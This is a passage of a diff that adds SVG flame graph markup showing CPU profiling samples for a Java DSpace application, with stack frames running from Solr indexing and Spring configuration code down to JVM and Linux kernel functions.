+<text  x="168.55" y="623.5" >[..</text>
+</g>
+<g >
+<title>[libjvm.so] (17 samples, 3.86%)</title><rect x="146.8" y="677" width="45.6" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="149.77" y="687.5" >[lib..</text>
+</g>
+<g >
+<title>java/util/Arrays:::copyOf (1 samples, 0.23%)</title><rect x="887.0" y="325" width="2.6" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="889.95" y="335.5" ></text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.23%)</title><rect x="701.9" y="293" width="2.7" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="704.91" y="303.5" ></text>
+</g>
+<g >
+<title>start_thread (19 samples, 4.32%)</title><rect x="141.4" y="805" width="51.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="144.41" y="815.5" >start..</text>
+</g>
+<g >
+<title>task_tick_fair (1 samples, 0.23%)</title><rect x="701.9" y="229" width="2.7" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="704.91" y="239.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (2 samples, 0.45%)</title><rect x="1160.5" y="469" width="5.4" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="1163.50" y="479.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.68%)</title><rect x="168.2" y="581" width="8.1" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="171.23" y="591.5" ></text>
+</g>
+<g >
+<title>schedule (4 samples, 0.91%)</title><rect x="299.6" y="693" width="10.8" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="302.64" y="703.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (24 samples, 5.45%)</title><rect x="63.6" y="629" width="64.4" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="66.64" y="639.5" >__intel..</text>
+</g>
+<g >
+<title>pthread_cond_timedwait@@GLIBC_2.3.2 (18 samples, 4.09%)</title><rect x="246.0" y="789" width="48.3" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="249.00" y="799.5" >pthr..</text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.23%)</title><rect x="216.5" y="677" width="2.7" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="219.50" y="687.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (17 samples, 3.86%)</title><rect x="492.7" y="613" width="45.6" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="495.73" y="623.5" >fini..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="294.3" y="773" width="5.3" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="297.27" y="783.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.23%)</title><rect x="755.5" y="341" width="2.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="758.55" y="351.5" ></text>
+</g>
+<g >
+<title>__softirqentry_text_start (18 samples, 4.09%)</title><rect x="594.6" y="533" width="48.3" height="15.0" fill="rgb(203,54,54)" rx="2" ry="2" />
+<text  x="597.64" y="543.5" >__so..</text>
+</g>
+<g >
+<title>futex_wait_queue_me (4 samples, 0.91%)</title><rect x="299.6" y="709" width="10.8" height="15.0" fill="rgb(210,64,64)" rx="2" ry="2" />
+<text  x="302.64" y="719.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (17 samples, 3.86%)</title><rect x="492.7" y="597" width="45.6" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="495.73" y="607.5" >__pe..</text>
+</g>
+<g >
+<title>do_mprotect_pkey (1 samples, 0.23%)</title><rect x="347.9" y="645" width="2.7" height="15.0" fill="rgb(204,56,56)" rx="2" ry="2" />
+<text  x="350.91" y="655.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (189 samples, 42.95%)</title><rect x="667.0" y="565" width="506.9" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="670.05" y="575.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>[unknown] (48 samples, 10.91%)</title><rect x="353.3" y="805" width="128.7" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="356.27" y="815.5" >[unknown]</text>
+</g>
+<g >
+<title>do_IRQ (1 samples, 0.23%)</title><rect x="484.7" y="677" width="2.7" height="15.0" fill="rgb(203,54,54)" rx="2" ry="2" />
+<text  x="487.68" y="687.5" ></text>
+</g>
+<g >
+<title>tcp_sendmsg (38 samples, 8.64%)</title><rect x="562.5" y="709" width="101.9" height="15.0" fill="rgb(224,86,86)" rx="2" ry="2" />
+<text  x="565.45" y="719.5" >tcp_sendmsg</text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (12 samples, 2.73%)</title><rect x="310.4" y="629" width="32.1" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="313.36" y="639.5" >__..</text>
+</g>
+<g >
+<title>java/util/Date:::normalize (1 samples, 0.23%)</title><rect x="667.0" y="421" width="2.7" height="15.0" fill="rgb(100,246,100)" rx="2" ry="2" />
+<text  x="670.05" y="431.5" ></text>
+</g>
+<g >
+<title>do_softirq_own_stack (18 samples, 4.09%)</title><rect x="594.6" y="549" width="48.3" height="15.0" fill="rgb(217,74,74)" rx="2" ry="2" />
+<text  x="597.64" y="559.5" >do_s..</text>
+</g>
+<g >
+<title>futex_wait_queue_me (13 samples, 2.95%)</title><rect x="310.4" y="709" width="34.8" height="15.0" fill="rgb(214,70,70)" rx="2" ry="2" />
+<text  x="313.36" y="719.5" >fu..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="240.6" y="741" width="5.4" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="243.64" y="751.5" ></text>
+</g>
+<g >
+<title>ip_rcv (16 samples, 3.64%)</title><rect x="600.0" y="469" width="42.9" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="603.00" y="479.5" >ip_rcv</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="956.7" y="405" width="2.7" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="959.68" y="415.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.23%)</title><rect x="913.8" y="357" width="2.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="916.77" y="367.5" ></text>
+</g>
+<g >
+<title>__schedule (25 samples, 5.68%)</title><rect x="63.6" y="677" width="67.1" height="15.0" fill="rgb(206,58,58)" rx="2" ry="2" />
+<text  x="66.64" y="687.5" >__sched..</text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.23%)</title><rect x="701.9" y="309" width="2.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="704.91" y="319.5" ></text>
+</g>
+<g >
+<title>__mprotect (1 samples, 0.23%)</title><rect x="350.6" y="725" width="2.7" height="15.0" fill="rgb(225,87,87)" rx="2" ry="2" />
+<text  x="353.59" y="735.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.23%)</title><rect x="956.7" y="293" width="2.7" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="959.68" y="303.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.23%)</title><rect x="701.9" y="341" width="2.7" height="15.0" fill="rgb(226,88,88)" rx="2" ry="2" />
+<text  x="704.91" y="351.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (2 samples, 0.45%)</title><rect x="1098.8" y="325" width="5.4" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="1101.82" y="335.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (4 samples, 0.91%)</title><rect x="299.6" y="773" width="10.8" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="302.64" y="783.5" ></text>
+</g>
+<g >
+<title>tcp_newly_delivered (1 samples, 0.23%)</title><rect x="1128.3" y="37" width="2.7" height="15.0" fill="rgb(207,61,61)" rx="2" ry="2" />
+<text  x="1131.32" y="47.5" ></text>
+</g>
+<g >
+<title>mprotect_fixup (1 samples, 0.23%)</title><rect x="350.6" y="645" width="2.7" height="15.0" fill="rgb(229,93,93)" rx="2" ry="2" />
+<text  x="353.59" y="655.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readSolrDocumentList (1 samples, 0.23%)</title><rect x="1106.9" y="373" width="2.6" height="15.0" fill="rgb(57,207,57)" rx="2" ry="2" />
+<text  x="1109.86" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="1141.7" y="293" width="5.4" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="1144.73" y="303.5" ></text>
+</g>
+<g >
+<title>__x64_sys_connect (1 samples, 0.23%)</title><rect x="1128.3" y="165" width="2.7" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="1131.32" y="175.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.45%)</title><rect x="948.6" y="389" width="5.4" height="15.0" fill="rgb(104,249,104)" rx="2" ry="2" />
+<text  x="951.64" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (6 samples, 1.36%)</title><rect x="669.7" y="437" width="16.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="672.73" y="447.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.23%)</title><rect x="742.1" y="309" width="2.7" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="745.14" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/XML:::escape (12 samples, 2.73%)</title><rect x="712.6" y="325" width="32.2" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="715.64" y="335.5" >or..</text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (16 samples, 3.64%)</title><rect x="15.4" y="629" width="42.9" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="18.36" y="639.5" >__in..</text>
+</g>
+<g >
+<title>java/lang/StringCoding:::encode (3 samples, 0.68%)</title><rect x="672.4" y="405" width="8.1" height="15.0" fill="rgb(54,203,54)" rx="2" ry="2" />
+<text  x="675.41" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.68%)</title><rect x="345.2" y="773" width="8.1" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="348.23" y="783.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (4 samples, 0.91%)</title><rect x="769.0" y="357" width="10.7" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="771.95" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.68%)</title><rect x="1066.6" y="421" width="8.1" height="15.0" fill="rgb(53,203,53)" rx="2" ry="2" />
+<text  x="1069.64" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::executeQuery (2 samples, 0.45%)</title><rect x="1168.5" y="405" width="5.4" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="1171.55" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/QueryRequest:::process (10 samples, 2.27%)</title><rect x="1082.7" y="453" width="26.8" height="15.0" fill="rgb(71,220,71)" rx="2" ry="2" />
+<text  x="1085.73" y="463.5" >o..</text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Branch:::match (1 samples, 0.23%)</title><rect x="892.3" y="309" width="2.7" height="15.0" fill="rgb(103,249,103)" rx="2" ry="2" />
+<text  x="895.32" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="798.5" y="405" width="2.6" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="801.45" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/util/MultiFormatDateParser:::parse (2 samples, 0.45%)</title><rect x="1077.4" y="453" width="5.3" height="15.0" fill="rgb(106,252,106)" rx="2" ry="2" />
+<text  x="1080.36" y="463.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/TypeConverterDelegate:::convertIfNecessary (27 samples, 6.14%)</title><rect x="822.6" y="421" width="72.4" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="825.59" y="431.5" >org/spri..</text>
+</g>
+<g >
+<title>_copy_from_iter_full (1 samples, 0.23%)</title><rect x="653.6" y="677" width="2.7" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="656.64" y="687.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getCollections (1 samples, 0.23%)</title><rect x="798.5" y="437" width="2.6" height="15.0" fill="rgb(61,210,61)" rx="2" ry="2" />
+<text  x="801.45" y="447.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::doCreateBean (7 samples, 1.59%)</title><rect x="975.5" y="389" width="18.7" height="15.0" fill="rgb(81,229,81)" rx="2" ry="2" />
+<text  x="978.45" y="399.5" ></text>
+</g>
+<g >
+<title>__kmalloc_node_track_caller (1 samples, 0.23%)</title><rect x="659.0" y="645" width="2.7" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="662.00" y="655.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="216.5" y="757" width="2.7" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="219.50" y="767.5" ></text>
+</g>
+<g >
+<title>enqueue_task_fair (1 samples, 0.23%)</title><rect x="610.7" y="293" width="2.7" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="613.73" y="303.5" ></text>
+</g>
+<g >
+<title>com/atmire/dspace/discovery/AtmireSolrService:::writeDocument (49 samples, 11.14%)</title><rect x="667.0" y="453" width="131.5" height="15.0" fill="rgb(66,215,66)" rx="2" ry="2" />
+<text  x="670.05" y="463.5" >com/atmire/dspac..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="293" width="2.7" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="176.59" y="303.5" ></text>
+</g>
+<g >
+<title>JVM_DoPrivileged (1 samples, 0.23%)</title><rect x="1090.8" y="357" width="2.7" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="1093.77" y="367.5" ></text>
+</g>
+<g >
+<title>java/lang/AbstractStringBuilder:::append (1 samples, 0.23%)</title><rect x="1085.4" y="373" width="2.7" height="15.0" fill="rgb(66,215,66)" rx="2" ry="2" />
+<text  x="1088.41" y="383.5" ></text>
+</g>
+<g >
+<title>sk_page_frag_refill (1 samples, 0.23%)</title><rect x="656.3" y="677" width="2.7" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="659.32" y="687.5" ></text>
+</g>
+<g >
+<title>schedule (16 samples, 3.64%)</title><rect x="248.7" y="693" width="42.9" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="251.68" y="703.5" >sche..</text>
+</g>
+<g >
+<title>update_cfs_group (1 samples, 0.23%)</title><rect x="701.9" y="213" width="2.7" height="15.0" fill="rgb(245,116,116)" rx="2" ry="2" />
+<text  x="704.91" y="223.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (14 samples, 3.18%)</title><rect x="152.1" y="645" width="37.6" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="155.14" y="655.5" >[li..</text>
+</g>
+<g >
+<title>__mprotect (1 samples, 0.23%)</title><rect x="347.9" y="709" width="2.7" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="350.91" y="719.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.23%)</title><rect x="347.9" y="677" width="2.7" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="350.91" y="687.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/BasicHttpContext:::setAttribute (1 samples, 0.23%)</title><rect x="1104.2" y="373" width="2.7" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="1107.18" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readVal (1 samples, 0.23%)</title><rect x="1106.9" y="357" width="2.6" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="1109.86" y="367.5" ></text>
+</g>
+<g >
+<title>native_write_msr (16 samples, 3.64%)</title><rect x="492.7" y="565" width="42.9" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="495.73" y="575.5" >nati..</text>
+</g>
+<g >
+<title>java/net/URI:::&lt;init&gt; (1 samples, 0.23%)</title><rect x="1088.1" y="373" width="2.7" height="15.0" fill="rgb(70,219,70)" rx="2" ry="2" />
+<text  x="1091.09" y="383.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.23%)</title><rect x="935.2" y="405" width="2.7" height="15.0" fill="rgb(65,214,65)" rx="2" ry="2" />
+<text  x="938.23" y="415.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (1 samples, 0.23%)</title><rect x="892.3" y="293" width="2.7" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="895.32" y="303.5" ></text>
+</g>
+<g >
+<title>schedule (19 samples, 4.32%)</title><rect x="487.4" y="645" width="50.9" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="490.36" y="655.5" >sched..</text>
+</g>
+<g >
+<title>scheduler_tick (1 samples, 0.23%)</title><rect x="755.5" y="277" width="2.7" height="15.0" fill="rgb(226,88,88)" rx="2" ry="2" />
+<text  x="758.55" y="287.5" ></text>
+</g>
+<g >
+<title>__virt_addr_valid (1 samples, 0.23%)</title><rect x="538.3" y="645" width="2.7" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="541.32" y="655.5" ></text>
+</g>
+<g >
+<title>__pthread_mutex_unlock_usercnt (1 samples, 0.23%)</title><rect x="61.0" y="677" width="2.6" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="63.95" y="687.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeanNamesForType (19 samples, 4.32%)</title><rect x="994.2" y="405" width="51.0" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="997.23" y="415.5" >org/s..</text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (4 samples, 0.91%)</title><rect x="299.6" y="645" width="10.8" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="302.64" y="655.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1171.2" y="293" width="2.7" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="1174.23" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (13 samples, 2.95%)</title><rect x="760.9" y="389" width="34.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="763.91" y="399.5" >or..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (14 samples, 3.18%)</title><rect x="1112.2" y="437" width="37.6" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="1115.23" y="447.5" >org..</text>
+</g>
+<g >
+<title>futex_wait_queue_me (8 samples, 1.82%)</title><rect x="195.0" y="709" width="21.5" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="198.05" y="719.5" >f..</text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (19 samples, 4.32%)</title><rect x="10.0" y="773" width="51.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="13.00" y="783.5" >entry..</text>
+</g>
+<g >
+<title>__queue_work (1 samples, 0.23%)</title><rect x="484.7" y="533" width="2.7" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="487.68" y="543.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="908.4" y="357" width="2.7" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="911.41" y="367.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::escape (1 samples, 0.23%)</title><rect x="991.5" y="213" width="2.7" height="15.0" fill="rgb(101,247,101)" rx="2" ry="2" />
+<text  x="994.55" y="223.5" ></text>
+</g>
+<g >
+<title>ip_protocol_deliver_rcu (8 samples, 1.82%)</title><rect x="602.7" y="437" width="21.4" height="15.0" fill="rgb(214,70,70)" rx="2" ry="2" />
+<text  x="605.68" y="447.5" >i..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="170.9" y="485" width="5.4" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="173.91" y="495.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (8 samples, 1.82%)</title><rect x="195.0" y="645" width="21.5" height="15.0" fill="rgb(210,64,64)" rx="2" ry="2" />
+<text  x="198.05" y="655.5" >_..</text>
+</g>
+<g >
+<title>finish_task_switch (8 samples, 1.82%)</title><rect x="195.0" y="661" width="21.5" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="198.05" y="671.5" >f..</text>
+</g>
+<g >
+<title>syscall_return_via_sysret (1 samples, 0.23%)</title><rect x="664.4" y="789" width="2.6" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="667.36" y="799.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1171.2" y="277" width="2.7" height="15.0" fill="rgb(225,86,86)" rx="2" ry="2" />
+<text  x="1174.23" y="287.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="61.0" y="757" width="2.6" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="63.95" y="767.5" ></text>
+</g>
+<g >
+<title>java/util/LinkedHashMap:::removeEldestEntry (1 samples, 0.23%)</title><rect x="1106.9" y="261" width="2.6" height="15.0" fill="rgb(54,204,54)" rx="2" ry="2" />
+<text  x="1109.86" y="271.5" ></text>
+</g>
+<g >
+<title>enqueue_to_backlog (1 samples, 0.23%)</title><rect x="589.3" y="501" width="2.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="592.27" y="511.5" ></text>
+</g>
+<g >
+<title>copy_user_enhanced_fast_string (1 samples, 0.23%)</title><rect x="653.6" y="645" width="2.7" height="15.0" fill="rgb(218,77,77)" rx="2" ry="2" />
+<text  x="656.64" y="655.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1123.0" y="357" width="2.6" height="15.0" fill="rgb(205,57,57)" rx="2" ry="2" />
+<text  x="1125.95" y="367.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/GenericTypeResolver:::doResolveTypeArguments (1 samples, 0.23%)</title><rect x="857.5" y="357" width="2.6" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="860.45" y="367.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Community:::getAllParents (3 samples, 0.68%)</title><rect x="908.4" y="453" width="8.1" height="15.0" fill="rgb(56,206,56)" rx="2" ry="2" />
+<text  x="911.41" y="463.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.23%)</title><rect x="798.5" y="261" width="2.6" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="801.45" y="271.5" ></text>
+</g>
+<g >
+<title>pick_next_task_fair (1 samples, 0.23%)</title><rect x="128.0" y="661" width="2.7" height="15.0" fill="rgb(202,52,52)" rx="2" ry="2" />
+<text  x="131.00" y="671.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (4 samples, 0.91%)</title><rect x="299.6" y="661" width="10.8" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="302.64" y="671.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/SolrInputDocument:::getFieldValues (1 samples, 0.23%)</title><rect x="795.8" y="437" width="2.7" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="798.77" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (2 samples, 0.45%)</title><rect x="1131.0" y="389" width="5.4" height="15.0" fill="rgb(82,230,82)" rx="2" ry="2" />
+<text  x="1134.00" y="399.5" ></text>
+</g>
+<g >
+<title>_raw_spin_lock (1 samples, 0.23%)</title><rect x="589.3" y="485" width="2.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="592.27" y="495.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/logging/impl/SLF4JLocationAwareLog:::isDebugEnabled (1 samples, 0.23%)</title><rect x="685.8" y="389" width="2.7" height="15.0" fill="rgb(56,205,56)" rx="2" ry="2" />
+<text  x="688.82" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::getPropertyAsType (27 samples, 6.14%)</title><rect x="822.6" y="437" width="72.4" height="15.0" fill="rgb(104,250,104)" rx="2" ry="2" />
+<text  x="825.59" y="447.5" >org/dspa..</text>
+</g>
+<g >
+<title>tlb_is_not_lazy (1 samples, 0.23%)</title><rect x="350.6" y="581" width="2.7" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="353.59" y="591.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/env/MutablePropertySources:::addLast (7 samples, 1.59%)</title><rect x="876.2" y="357" width="18.8" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="879.23" y="367.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (1 samples, 0.23%)</title><rect x="1047.9" y="437" width="2.6" height="15.0" fill="rgb(70,218,70)" rx="2" ry="2" />
+<text  x="1050.86" y="447.5" ></text>
+</g>
+<g >
+<title>java/util/Formatter:::format (7 samples, 1.59%)</title><rect x="876.2" y="341" width="18.8" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="879.23" y="351.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getCollections (3 samples, 0.68%)</title><rect x="956.7" y="437" width="8.0" height="15.0" fill="rgb(71,219,71)" rx="2" ry="2" />
+<text  x="959.68" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="798.5" y="245" width="2.6" height="15.0" fill="rgb(225,86,86)" rx="2" ry="2" />
+<text  x="801.45" y="255.5" ></text>
+</g>
+<g >
+<title>prepare_exit_to_usermode (4 samples, 0.91%)</title><rect x="176.3" y="581" width="10.7" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="179.27" y="591.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolableConnectionFactory:::validateConnection (2 samples, 0.45%)</title><rect x="1168.5" y="421" width="5.4" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="1171.55" y="431.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (2 samples, 0.45%)</title><rect x="978.1" y="229" width="5.4" height="15.0" fill="rgb(92,238,92)" rx="2" ry="2" />
+<text  x="981.14" y="239.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryConnect (1 samples, 0.23%)</title><rect x="1128.3" y="389" width="2.7" height="15.0" fill="rgb(90,236,90)" rx="2" ry="2" />
+<text  x="1131.32" y="399.5" ></text>
+</g>
+<g >
+<title>pthread_cond_wait@@GLIBC_2.3.2 (8 samples, 1.82%)</title><rect x="219.2" y="789" width="21.4" height="15.0" fill="rgb(205,57,57)" rx="2" ry="2" />
+<text  x="222.18" y="799.5" >p..</text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.23%)</title><rect x="755.5" y="325" width="2.7" height="15.0" fill="rgb(247,118,118)" rx="2" ry="2" />
+<text  x="758.55" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="935.2" y="357" width="2.7" height="15.0" fill="rgb(106,252,106)" rx="2" ry="2" />
+<text  x="938.23" y="367.5" ></text>
+</g>
+<g >
+<title>Java_java_net_PlainSocketImpl_socketSetOption0 (1 samples, 0.23%)</title><rect x="779.7" y="325" width="2.7" height="15.0" fill="rgb(202,54,54)" rx="2" ry="2" />
+<text  x="782.68" y="335.5" ></text>
+</g>
+<g >
